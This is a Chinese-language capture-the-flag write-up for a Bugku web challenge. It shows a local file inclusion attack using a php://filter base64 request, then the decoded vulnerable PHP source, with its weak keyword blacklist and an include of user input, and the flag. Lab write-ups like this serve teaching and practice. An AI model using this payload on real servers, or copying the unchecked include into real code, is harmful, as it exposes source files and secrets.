flag在index里

题目：http://123.206.87.240:8005/post/

我们来看这一题

首先打开题目

他让点击就点击呗

跳转到另一个新的界面

这就没了？？？

。。。

没思路就对了   　　//假装证明自己还有进步的空间

去偷瞟一下别人的WP

稍微有点思路了

这道题是  本地文件包含漏洞+php伪协议    的结合应用

file关键字是提示，说明这题有文件包含漏洞

php的封装协议：http://php.net/manual/zh/wrappers.php.php

---

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

 首先这是一个file关键字的get参数传递

php:// 　　　　是一种协议名称

php://filter/ 　　是一种访问本地文件的协议

/read=convert.base64-encode/　　表示读取的方式是base64编码后

resource=index.php　　表示目标文件为index.php

---

访问结果：

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

一大串乱码？？

试试base64解码

通过base64位解码得到 FLAG

 <html>
 <title>Bugku-ctf</title>
 <?php
 error_reporting(0);
  if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
 　　　　　　　　　　　　　　　　　　　　　单机跳转到 ./../show.php
  $file=$_GET['file'];
   if(strstr($file,"../")||stristr($file, "tp")||
　　　stristr($file,"input")||stristr($file,"data")){
 　　　当get传参中出现  ../   tp  input  data   这些关键词的时
    echo "Oh no!";
  　输出 ··
    exit();
    结束
    }
   include($file);
 //flag:flag{edulcni_elif_lacol_si_siht}    //flag
 ?>
 </html>

参考：

谈一谈php://filter的妙用